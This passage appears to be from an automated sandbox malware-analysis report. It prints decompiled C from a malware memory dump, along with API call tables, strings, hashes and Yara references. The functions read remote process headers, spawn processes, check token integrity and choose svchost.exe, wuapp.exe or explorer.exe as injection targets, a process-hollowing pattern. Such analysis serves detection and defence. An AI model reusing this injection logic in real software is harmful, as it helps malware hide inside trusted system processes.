													goto L33;
												} else {
													goto L18;
												}
											}
										} else {
											goto L18;
										}
									}
								}
							}
						}
					}
				}
				L35:
			}



















































                                                                                                                                          0x035d5e60
                                                                                                                                          0x035d5e60
                                                                                                                                          0x035d5e61
                                                                                                                                          0x035d5e70
                                                                                                                                          0x035d5e8c
                                                                                                                                          0x035d5e91
                                                                                                                                          0x035d5e99
                                                                                                                                          0x035d5e9c
                                                                                                                                          0x035d5ea6
                                                                                                                                          0x035d5ea9
                                                                                                                                          0x035d5eae
                                                                                                                                          0x035d5eb1
                                                                                                                                          0x035d5ebe
                                                                                                                                          0x035d5ec3
                                                                                                                                          0x035d5ec3
                                                                                                                                          0x035d5ecb
                                                                                                                                          0x035d5ed2
                                                                                                                                          0x035d5ed5
                                                                                                                                          0x035d5ed8
                                                                                                                                          0x035d5edb
                                                                                                                                          0x035d5edd
                                                                                                                                          0x035d61de
                                                                                                                                          0x035d61df
                                                                                                                                          0x035d61e8
                                                                                                                                          0x035d5eec
                                                                                                                                          0x035d5eef
                                                                                                                                          0x035d5ef7
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5efd
                                                                                                                                          0x035d5f05
                                                                                                                                          0x035d5f12
                                                                                                                                          0x035d5f17
                                                                                                                                          0x035d5f1a
                                                                                                                                          0x035d5f2b
                                                                                                                                          0x035d5f2f
                                                                                                                                          0x035d5f30
                                                                                                                                          0x035d5f32
                                                                                                                                          0x035d5f34
                                                                                                                                          0x035d5f3d
                                                                                                                                          0x035d5f36
                                                                                                                                          0x035d5f36
                                                                                                                                          0x035d5f36
                                                                                                                                          0x035d5f4a
                                                                                                                                          0x035d5f50
                                                                                                                                          0x035d5f52
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5f58
                                                                                                                                          0x035d5f68
                                                                                                                                          0x035d5f6d
                                                                                                                                          0x035d5f70
                                                                                                                                          0x035d5f72
                                                                                                                                          0x035d61c3
                                                                                                                                          0x035d61c8
                                                                                                                                          0x035d61d7
                                                                                                                                          0x035d61dc
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5f78
                                                                                                                                          0x035d5f91
                                                                                                                                          0x035d5f9f
                                                                                                                                          0x035d5fa4
                                                                                                                                          0x035d5fa9
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5faf
                                                                                                                                          0x035d5faf
                                                                                                                                          0x035d5fb2
                                                                                                                                          0x035d5fb5
                                                                                                                                          0x035d5fb8
                                                                                                                                          0x035d5fbb
                                                                                                                                          0x035d5fbd
                                                                                                                                          0x035d5ff9
                                                                                                                                          0x035d600c
                                                                                                                                          0x035d6013
                                                                                                                                          0x035d6018
                                                                                                                                          0x035d601b
                                                                                                                                          0x00000000
                                                                                                                                          0x035d603b
                                                                                                                                          0x035d603b
                                                                                                                                          0x035d6055
                                                                                                                                          0x00000000
                                                                                                                                          0x035d605b
                                                                                                                                          0x035d605b
                                                                                                                                          0x035d6061
                                                                                                                                          0x035d606c
                                                                                                                                          0x035d60e2
                                                                                                                                          0x035d60fb
                                                                                                                                          0x035d610a
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6110
                                                                                                                                          0x035d6115
                                                                                                                                          0x035d611a
                                                                                                                                          0x035d612a
                                                                                                                                          0x035d612c
                                                                                                                                          0x035d6139
                                                                                                                                          0x00000000
                                                                                                                                          0x035d614b
                                                                                                                                          0x035d6150
                                                                                                                                          0x035d6164
                                                                                                                                          0x035d616a
                                                                                                                                          0x035d616f
                                                                                                                                          0x035d6179
                                                                                                                                          0x035d6192
                                                                                                                                          0x035d61a1
                                                                                                                                          0x035d61a1
                                                                                                                                          0x035d61b0
                                                                                                                                          0x035d61b5
                                                                                                                                          0x035d61c2
                                                                                                                                          0x035d61c2
                                                                                                                                          0x035d6139
                                                                                                                                          0x035d606e
                                                                                                                                          0x035d6071
                                                                                                                                          0x035d6073
                                                                                                                                          0x035d6088
                                                                                                                                          0x035d6097
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60a0
                                                                                                                                          0x035d60a5
                                                                                                                                          0x035d60b8
                                                                                                                                          0x035d60c7
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60cd
                                                                                                                                          0x035d60d0
                                                                                                                                          0x035d60d7
                                                                                                                                          0x035d60d8
                                                                                                                                          0x035d60dd
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60df
                                                                                                                                          0x035d60df
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60df
                                                                                                                                          0x035d60dd
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60c7
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6073
                                                                                                                                          0x035d606c
                                                                                                                                          0x035d6055
                                                                                                                                          0x035d5fbf
                                                                                                                                          0x035d5fbf
                                                                                                                                          0x035d5fc2
                                                                                                                                          0x035d5fce
                                                                                                                                          0x035d5fd3
                                                                                                                                          0x035d5fd6
                                                                                                                                          0x035d5fd9
                                                                                                                                          0x035d5fdc
                                                                                                                                          0x035d5fde
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5fe7
                                                                                                                                          0x035d5fec
                                                                                                                                          0x035d5ff1
                                                                                                                                          0x035d5ff3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5ff3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5fc2
                                                                                                                                          0x035d5fbd
                                                                                                                                          0x035d5fa9
                                                                                                                                          0x035d5f72
                                                                                                                                          0x035d5f52
                                                                                                                                          0x035d5ef7
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 035D5F4A
                                                                                                                                          • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 035D6150
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 035D6164
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 035D61A1
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 035D61B0
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 035D61B5
                                                                                                                                            • Part of subcall function 035D74D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D74FF
                                                                                                                                            • Part of subcall function 035D73C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 035D7429
                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,035D49E6,?), ref: 035D61C8
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,035D49E6,?), ref: 035D61D7
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,035D49E6,?), ref: 035D61DC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseHandleProcess$CurrentVirtual$AllocCreateFreeSleepTerminate
                                                                                                                                          • String ID: 0125789244697858$ntdll.dll
                                                                                                                                          • API String ID: 1806556286-2057982665
                                                                                                                                          • Opcode ID: c0de727103e4e6004e929020a453a56e0b7f8f520121e76c2d334da0a61a83aa
                                                                                                                                          • Instruction ID: 7188e2ef643cfc59653bb36a415f2f5366846f1f460fd7a21b271c7ac017dee9
                                                                                                                                          • Opcode Fuzzy Hash: c0de727103e4e6004e929020a453a56e0b7f8f520121e76c2d334da0a61a83aa
                                                                                                                                          • Instruction Fuzzy Hash: D4B16F71D0020ABBEF20DF98ED41FAEF7B9FF44300F584055EA04A61A1E771AA55DB94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D5A50, Relevance: 16.6, APIs: 11, Instructions: 117memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                          			E035D5A50(void* __ecx, void* _a4, void* _a8, long* _a12, long* _a16) {
				void* _v8;
				void* _t31;
				int _t32;
				int _t36;
				void* _t44;
				long _t46;
				void* _t56;
				void* _t60;

				 *_a12 = 0;
				 *_a16 = 0;
				_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
				if(_t56 == 0) {
					L3:
					return 0;
				} else {
					if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
						if( *_t56 != 0x5a4d) {
							goto L2;
						} else {
							_v8 =  *((intOrPtr*)(_t56 + 0x3c));
							VirtualFree(_t56, 0, 0x8000);
							_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
							if(_t44 == 0) {
								L11:
								return 0;
							} else {
								_t31 = _a8 + _v8;
								_v8 = _t31;
								_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
								_push(0x8000);
								_push(0);
								_push(_t44);
								if(_t32 == 0 ||  *_t44 != 0x4550) {
									L10:
									VirtualFree();
									goto L11;
								} else {
									VirtualFree();
									_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
									_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
									if(_t60 == 0) {
										goto L11;
									} else {
										_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
										_push(0x8000);
										_push(0);
										_push(_t60);
										if(_t36 != 0) {
											if( *_t60 != 0x4550) {
												goto L10;
											} else {
												 *_a12 =  *(_t60 + 0x50);
												 *_a16 =  *(_t60 + 0x28);
												VirtualFree(??, ??, ??);
												return 1;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					} else {
						L2:
						VirtualFree(_t56, 0, 0x8000);
						goto L3;
					}
				}
			}











                                                                                                                                          0x035d5a61
                                                                                                                                          0x035d5a73
                                                                                                                                          0x035d5a7b
                                                                                                                                          0x035d5a7f
                                                                                                                                          0x035d5aa4
                                                                                                                                          0x035d5aab
                                                                                                                                          0x035d5a81
                                                                                                                                          0x035d5a94
                                                                                                                                          0x035d5ab4
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5ab6
                                                                                                                                          0x035d5ac8
                                                                                                                                          0x035d5acb
                                                                                                                                          0x035d5ada
                                                                                                                                          0x035d5ade
                                                                                                                                          0x035d5b49
                                                                                                                                          0x035d5b51
                                                                                                                                          0x035d5ae0
                                                                                                                                          0x035d5ae3
                                                                                                                                          0x035d5aef
                                                                                                                                          0x035d5af2
                                                                                                                                          0x035d5af8
                                                                                                                                          0x035d5afd
                                                                                                                                          0x035d5aff
                                                                                                                                          0x035d5b02
                                                                                                                                          0x035d5b47
                                                                                                                                          0x035d5b47
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5b0c
                                                                                                                                          0x035d5b10
                                                                                                                                          0x035d5b19
                                                                                                                                          0x035d5b25
                                                                                                                                          0x035d5b29
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5b2b
                                                                                                                                          0x035d5b35
                                                                                                                                          0x035d5b3b
                                                                                                                                          0x035d5b40
                                                                                                                                          0x035d5b42
                                                                                                                                          0x035d5b45
                                                                                                                                          0x035d5b58
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5b5a
                                                                                                                                          0x035d5b60
                                                                                                                                          0x035d5b68
                                                                                                                                          0x035d5b6a
                                                                                                                                          0x035d5b74
                                                                                                                                          0x035d5b74
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5b45
                                                                                                                                          0x035d5b29
                                                                                                                                          0x035d5b02
                                                                                                                                          0x035d5ade
                                                                                                                                          0x035d5a96
                                                                                                                                          0x035d5a96
                                                                                                                                          0x035d5a9e
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5a9e
                                                                                                                                          0x035d5a94

                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,74B05B60,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5A79
                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5A8C
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 035D5A9E
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,035D49E6,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5ACB
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5AD8
                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5AF2
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 035D5B10
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5B1F
                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5B35
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 035D5B47
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 035D5B6A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$Free$AllocMemoryProcessRead
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1260273505-0
                                                                                                                                          • Opcode ID: a016455ba07ac6334c8be2811735e6e13c72dfed8973b85bc0674ee8ba0e75c3
                                                                                                                                          • Instruction ID: 58d8427f4b6afa5686a1fcf27c6f835dfa1942e989c9bc17b2b4d67f1afb5e4d
                                                                                                                                          • Opcode Fuzzy Hash: a016455ba07ac6334c8be2811735e6e13c72dfed8973b85bc0674ee8ba0e75c3
                                                                                                                                          • Instruction Fuzzy Hash: 40318F71241314BBEB319E99EC41F9A7BA8FB05B15F100455FB04AB1D0D7B1A8159BA4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D7FA0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 56libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 22%
                                                                                                                                          			E035D7FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t22;

				_t22 = LoadLibraryA("Shell32.dll");
				if(_t22 == 0) {
					L8:
					return 0;
				} else {
					_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
					if(_t11 == 0) {
						_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
						if(_t12 == 0) {
							goto L7;
						} else {
							_push(_a4);
							_push(0);
							_push(0);
							_push(_a12);
							_push(0);
							if( *_t12() == 0) {
								goto L4;
							} else {
								goto L7;
							}
						}
					} else {
						_v8 = 0;
						_push( &_v8);
						_push(0);
						_push(0);
						_push(_a8);
						if( *_t11() != 0) {
							L7:
							FreeLibrary(_t22);
							goto L8;
						} else {
							E035D1A00(_a4, _v8);
							__imp__CoTaskMemFree(_v8);
							L4:
							FreeLibrary(_t22);
							return 1;
						}
					}
				}
			}







                                                                                                                                          0x035d7fb0
                                                                                                                                          0x035d7fb4
                                                                                                                                          0x035d802f
                                                                                                                                          0x035d8035
                                                                                                                                          0x035d7fb6
                                                                                                                                          0x035d7fbc
                                                                                                                                          0x035d7fc4
                                                                                                                                          0x035d800c
                                                                                                                                          0x035d8014
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8016
                                                                                                                                          0x035d8016
                                                                                                                                          0x035d8019
                                                                                                                                          0x035d801b
                                                                                                                                          0x035d801d
                                                                                                                                          0x035d8020
                                                                                                                                          0x035d8026
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8026
                                                                                                                                          0x035d7fc6
                                                                                                                                          0x035d7fc9
                                                                                                                                          0x035d7fd0
                                                                                                                                          0x035d7fd1
                                                                                                                                          0x035d7fd3
                                                                                                                                          0x035d7fd5
                                                                                                                                          0x035d7fdc
                                                                                                                                          0x035d8028
                                                                                                                                          0x035d8029
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7fde
                                                                                                                                          0x035d7fe4
                                                                                                                                          0x035d7fef
                                                                                                                                          0x035d7ff5
                                                                                                                                          0x035d7ff6
                                                                                                                                          0x035d8005
                                                                                                                                          0x035d8005
                                                                                                                                          0x035d7fdc
                                                                                                                                          0x035d7fc4

                                                                                                                                          APIs
                                                                                                                                          • LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FAA
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FBC
                                                                                                                                          • CoTaskMemFree.OLE32(00000000,035DAAE0), ref: 035D7FEF
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FF6
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D800C
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D8029
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeLibrary$AddressProc$LoadTask
                                                                                                                                          • String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
                                                                                                                                          • API String ID: 2437428030-337183102
                                                                                                                                          • Opcode ID: ca8f13d752749f94cbfa4cbe569341493cd7737df3001ae34f293c24b57ff2c8
                                                                                                                                          • Instruction ID: a85dc8f52d66d370ac3dcaf6e2a614d9fb9c003202730d45bfb577c7b2aafe3d
                                                                                                                                          • Opcode Fuzzy Hash: ca8f13d752749f94cbfa4cbe569341493cd7737df3001ae34f293c24b57ff2c8
                                                                                                                                          • Instruction Fuzzy Hash: B2019671641715BBDB31AFA8FC0AF9E7B68FF08641F040050FD04E51A0EBB5D625A695
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D6340, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 206memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 035D63BC
                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 035D644C
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?), ref: 035D6472
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D64C0
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D64F5
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D6591
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D65BA
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$Free$File$AllocModuleNameSize
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 994213472-2766056989
                                                                                                                                          • Opcode ID: ebc3762970712cf648a0e81cec32078f9c2fb543017b0269cf0408946954ed35
                                                                                                                                          • Instruction ID: 9fecf11d075eef3a16a050159bd5e989eb531866ff3bda3d68b66740efd4444d
                                                                                                                                          • Opcode Fuzzy Hash: ebc3762970712cf648a0e81cec32078f9c2fb543017b0269cf0408946954ed35
                                                                                                                                          • Instruction Fuzzy Hash: B2716771A4021CABEB20DF94EC49FEEBBB8FF08704F504156F604FA190D7B566499B94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D82B0, Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E035D82B0(intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _t20;
				void* _t27;
				void* _t34;
				void* _t37;
				void* _t38;

				_v8 = 0;
				_v12 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
					L4:
					return 0;
				} else {
					if(GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
						_t20 = E035D15E0(_v12);
						_t38 = _t37 + 4;
						_t34 = _t20;
						if(GetTokenInformation(_v8, 1, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
							_push(_t34);
							goto L8;
						} else {
							_t27 = E035D7AA0( *_t34, _a4);
							_t38 = _t38 + 8;
							_push(_t34);
							if(_t27 == 0) {
								L8:
								E035D1510();
								CloseHandle(_v8);
								return 0;
							} else {
								E035D1510();
								CloseHandle(_v8);
								return 1;
							}
						}
					} else {
						CloseHandle(_v8);
						goto L4;
					}
				}
			}










                                                                                                                                          0x035d82b9
                                                                                                                                          0x035d82c3
                                                                                                                                          0x035d82d9
                                                                                                                                          0x035d8306
                                                                                                                                          0x035d830b
                                                                                                                                          0x035d82db
                                                                                                                                          0x035d82f0
                                                                                                                                          0x035d8310
                                                                                                                                          0x035d8315
                                                                                                                                          0x035d8318
                                                                                                                                          0x035d832f
                                                                                                                                          0x035d833d
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8356
                                                                                                                                          0x035d835b
                                                                                                                                          0x035d8360
                                                                                                                                          0x035d8363
                                                                                                                                          0x035d8366
                                                                                                                                          0x035d833e
                                                                                                                                          0x035d833e
                                                                                                                                          0x035d8349
                                                                                                                                          0x035d8355
                                                                                                                                          0x035d8368
                                                                                                                                          0x035d8368
                                                                                                                                          0x035d8373
                                                                                                                                          0x035d8382
                                                                                                                                          0x035d8382
                                                                                                                                          0x035d8366
                                                                                                                                          0x035d82fd
                                                                                                                                          0x035d8300
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8300
                                                                                                                                          0x035d82f0

                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000400), ref: 035D82CA
                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 035D82D1
                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 035D82E8
                                                                                                                                          • GetLastError.KERNEL32 ref: 035D82F2
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 035D8300
                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 035D8327
                                                                                                                                          • IsValidSid.ADVAPI32(00000000), ref: 035D8333
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 035D8349
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 035D8373
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2832165296-0
                                                                                                                                          • Opcode ID: 022becb54ebe20c880f4b77d9dff24af1e56764e4c3fe476e146b145228f9f1a
                                                                                                                                          • Instruction ID: e99c52da11592a562dbd68f8e323f12d436b632990c03e96ee8a218080a582dd
                                                                                                                                          • Opcode Fuzzy Hash: 022becb54ebe20c880f4b77d9dff24af1e56764e4c3fe476e146b145228f9f1a
                                                                                                                                          • Instruction Fuzzy Hash: 42212C75901108BBDF31AFA8FD09F9EBBB9FF04241F1401A0F909E5164E7329A65AA91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D3150, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 72COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E035D3150(intOrPtr _a4) {
				short _v524;
				int _t6;
				void* _t16;
				char* _t17;
				char* _t18;

				if( *0x37a1314 == 0) {
					if( *0x37a1318 == 0) {
						_t17 = L"\\System32\\wuapp.exe";
						_t18 = L"\\System32\\svchost.exe";
					} else {
						goto L4;
					}
				} else {
					if( *0x37a1318 != 0) {
						L4:
						_t17 = L"\\SysWOW64\\wuapp.exe";
						_t18 = L"\\SysWOW64\\svchost.exe";
					} else {
						_t17 = L"\\notepad.exe";
						_t18 = L"\\explorer.exe";
					}
				}
				_t6 = GetWindowsDirectoryW( &_v524, 0x104);
				if(_t6 == 0 || _t6 > 0x104) {
					return 0;
				} else {
					_t20 = _a4;
					E035D1A00(_a4,  &_v524);
					E035D1970(_a4, _t17);
					if(E035D7ED0(_t20) != 0) {
						L11:
						return 1;
					} else {
						E035D1A00(_t20,  &_v524);
						E035D1970(_t20, _t18);
						_t16 = E035D7ED0(_t20);
						if(_t16 != 0) {
							goto L11;
						} else {
							return _t16;
						}
					}
				}
			}








                                                                                                                                          0x035d3162
                                                                                                                                          0x035d3180
                                                                                                                                          0x035d318e
                                                                                                                                          0x035d3193
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d3164
                                                                                                                                          0x035d316b
                                                                                                                                          0x035d3182
                                                                                                                                          0x035d3182
                                                                                                                                          0x035d3187
                                                                                                                                          0x035d316d
                                                                                                                                          0x035d316d
                                                                                                                                          0x035d3172
                                                                                                                                          0x035d3172
                                                                                                                                          0x035d316b
                                                                                                                                          0x035d31a4
                                                                                                                                          0x035d31ac
                                                                                                                                          0x035d3215
                                                                                                                                          0x035d31b5
                                                                                                                                          0x035d31b6
                                                                                                                                          0x035d31c1
                                                                                                                                          0x035d31c8
                                                                                                                                          0x035d31d8
                                                                                                                                          0x035d3202
                                                                                                                                          0x035d320d
                                                                                                                                          0x035d31da
                                                                                                                                          0x035d31e2
                                                                                                                                          0x035d31e9
                                                                                                                                          0x035d31ef
                                                                                                                                          0x035d31f9
                                                                                                                                          0x00000000
                                                                                                                                          0x035d31fb
                                                                                                                                          0x035d3201
                                                                                                                                          0x035d3201
                                                                                                                                          0x035d31f9
                                                                                                                                          0x035d31d8

                                                                                                                                          APIs
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,74B04D40,00000000), ref: 035D31A4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryWindows
                                                                                                                                          • String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
                                                                                                                                          • API String ID: 3619848164-3654143111
                                                                                                                                          • Opcode ID: 30f9461a810382565b3ead26fb8e5aa231982782c85988e1163b53ee1fbced85
                                                                                                                                          • Instruction ID: 6f507e4086edf4cd3b184b49ecac4f4f75243e7c42e30bda9a4f702e23e2d568
                                                                                                                                          • Opcode Fuzzy Hash: 30f9461a810382565b3ead26fb8e5aa231982782c85988e1163b53ee1fbced85
                                                                                                                                          • Instruction Fuzzy Hash: AA115E79B0171962EB30E55CBC44BAAB36CFB45165F0C01A6DC09C5130D7358AC582E7
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D29E0, Relevance: 10.8, APIs: 7, Instructions: 322threadsleepmemoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 17%
                                                                                                                                          			E035D29E0(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16, DWORD* _a20, intOrPtr _a24) {
				CHAR* _v8;
				CHAR* _v12;
				void* _v16;
				long _v20;
				CHAR* _v24;
				long _v28;
				CHAR* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				long _v44;
				long _v48;
				long _v52;
				char _v56;
				long _v60;
